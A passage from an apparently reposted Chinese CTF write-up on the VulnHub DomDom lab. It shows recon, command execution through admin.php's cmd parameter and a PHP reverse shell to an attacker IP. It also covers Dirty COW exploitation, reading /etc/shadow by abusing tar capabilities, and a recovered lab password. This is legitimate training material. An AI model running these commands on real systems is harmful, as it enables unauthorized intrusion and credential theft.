当前位置: 首页 > news >正文

dom靶场

靶场下载地址:

https://www.vulnhub.com/entry/domdom-1,328/

一、信息收集

获取主机ip

nmap -sP 192.168.16.0/24netdiscover  -r 192.168.16.0/24

image-20230816105356176

端口版本获取

 nmap -sV -sC -A  -p 1-65535 192.168.16.209

开放端口只有80

image-20230816105831626

目录扫描

这里扫描php后缀的文件

gobuster  dir -u http://192.168.16.209    -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php

image-20230816110018723

这里扫描出两个目录一个/index.php,一个 /admin.php.

二、RCE漏洞利用

查看登录的网站

image-20230816110415566

image-20230816110432120

抓包

使用burpsuite抓取登录后的包

image-20230816110607584

把index.php更改为admin.php,发现存在cmd执行

image-20230816110701641

参数更改:

name=ad&username=ad&password=ad&access=access&cmd=ls

命令被成功执行

image-20230816110812243

nc反弹

1.开启监听

nc -lvnp 9002

2.反弹shell

这里使用python的shell

php -r '$sock=fsockopen("192.168.16.180",9002);exec("/bin/sh -i <&3 >&3 2>&3");'

进行加密后执行

image-20230816111100451

会话获取成功

image-20230816111137542

切换bash

python3 -c 'import pty;pty.spawn("/bin/bash")'

image-20230816111227762

这里推荐一个

https://www.revshells.com/ 网站生成反弹shell网站

三、方法一、脏牛提权

获取版本

uname -a

得到系统版本为Linux ubuntu 4.4.0-21-generic

漏洞检测

漏洞检测脚本进行检测 https://github.com/mzet-/linux-exploit-suggester

下载到kali

使用

python -m http.server

或者直接

wget https://github.com/The-Z-Labs/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh   

image-20230816112009911

添加上执行权限

chomd +x  linux-exploit-suggester.sh

执行

image-20230816112617090

脏牛漏洞利用

exp下载:wget https://www.exploit-db.com/download/40616

编译:这里编译会报错,不用管

gcc exp.c -o exp -pthread

添加执行权限

chmod +x  exp

运行,提权成功

image-20230816113010378

四、方法二、密码登陆提权

Linux系统利用可执行文件的Capabilities实现权限提升 - FreeBuf网络安全行业门户

Capabilities机制是在Linux内核2.2之后引入的,原理很简单,就是将之前与超级用户root(UID=0)关联的特权细分为不同的功能组

“Capabilities”(能力机制)是一种计算机安全模型,用于限制一个进程或用户在操作系统中能够执行的特定操作。它基于原则,即每个主体(进程或用户)只被授予执行特定操作所需的最低权限。

1.现在假设管理员对一些可执行文件设置了capabilities。测试人员通过下面的命令查找这些文件:

getcap -r / 2>/dev/null

image-20230816144230109

2.Linux内核中Capabilities的实现机制对比

linux Capabilities简介–#setcap cap_net_raw,cap_net_admin=eip /a.out | (moonsec.com)

这里tar命令,可以绕过文件的读权限检查以及目录的读/执行权限的检查。

/bin/tar = cap_dac_read_search+ep

利用此特性我们可以读取系统中的敏感信息。

tar cvf shadow.tar /etc/shadow  //创建压缩文件
tar -xvf shadow.tar  //解压缩
chmod +r shadow  //赋予读权限
cat shadow | grep root  //查看shadow文件的内容

image-20230816144650803

读取了/etc/shadow文件的内容

这里

tar -cvf domom.tar /home/domom
#打包home下的目录

解压

tar -xvf domom.tar

切换目录到桌面

ls 发现有个README.md,查看最后得到密码Mj7AGmPR-m&Vf>Ry{}LJRBS5nc+*V.#a

image-20230816145259481

登录成功

image-20230816145343667

http://www.lryc.cn/news/127547.html

相关文章:

  • go struct 的常见问题
  • Linux系统下的性能分析命令
  • 第十三课:QtCmd 命令行终端应用程序开发
  • Jmeter进阶使用:BeanShell实现接口前置和后置操作
  • 【知识分享】高防服务器的防御机制
  • 内网穿透-外远程连接中的RabbitMQ服务
  • 驱动DAY4 字符设备驱动分步注册和ioctl函数点亮LED灯
  • Python爬虫——scrapy_当当网图书管道封装
  • Linux下如何修改CPU 电源工作模式
  • Effective C++学习笔记(8)
  • 学校如何公布录取情况表?这个不用技术的方法,小白老师都能轻松制作
  • Chart GPT免费可用地址共享资源
  • 设计模式十八:中介者模式(Mediator Pattern)
  • 神经网络基础-神经网络补充概念-12-向量化逻辑回归的梯度输出
  • 2023-08-16力扣每日一题
  • 耗资170亿美元?三星电子在得克萨斯州建设新的半导体工厂
  • 黑马项目一阶段面试58题 Web14题(一)
  • 多线程与高并发--------线程池
  • 深度学习实战48-【未来的专家团队】基于AutoCompany模型的自动化企业概念设计与设想
  • 深入剖析:如何通过API优化云计算架构?快来看!
  • 基于STM32设计的中药分装系统
  • 消息队列学习笔记
  • 贝锐蒲公英:助力企业打造稳定高效的智能安防监控网络
  • SASS 学习笔记
  • Web菜鸟教程 - Springboot接入认证授权模块
  • 【深入理解ES6】块级作用域绑定
  • 使用fake为数据库生成随机数据
  • 树结构转List
  • Android复习(Android基础-四大组件)——Broadcast
  • Ubuntu下mysql8开启远程连接